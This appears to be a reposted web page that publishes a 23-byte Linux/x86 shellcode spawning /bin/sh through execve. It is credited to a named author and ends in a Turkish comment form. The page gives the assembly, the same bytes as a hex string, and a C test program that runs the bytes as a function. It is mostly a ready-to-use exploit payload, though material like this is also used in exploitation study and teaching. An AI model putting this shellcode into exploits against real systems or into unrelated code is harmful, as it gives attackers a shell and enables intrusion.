Linux/x86 – execve /bin/sh shellcode 23 bytes

Linux/x86 – execve /bin/sh shellcode 23 bytes

******************************************************
* Linux/x86 execve /bin/sh shellcode 23 bytes  *
******************************************************
* Author: Hamza Megahed                *
******************************************************
* Twitter: @Hamza_Mega                 *
******************************************************
* blog: hamza-mega[dot]blogspot[dot]com    *
******************************************************
* E-mail: hamza[dot]megahed[at]gmail[dot]com *
******************************************************
 
xor  %eax,%eax
push  %eax
push  $0x68732f2f
push  $0x6e69622f
mov  %esp,%ebx
push  %eax
push  %ebx
mov  %esp,%ecx
mov  $0xb,%al
int  $0x80
 
**********************************************
 
#include <stdio.h>
#include <string.h>
 
char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
 
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir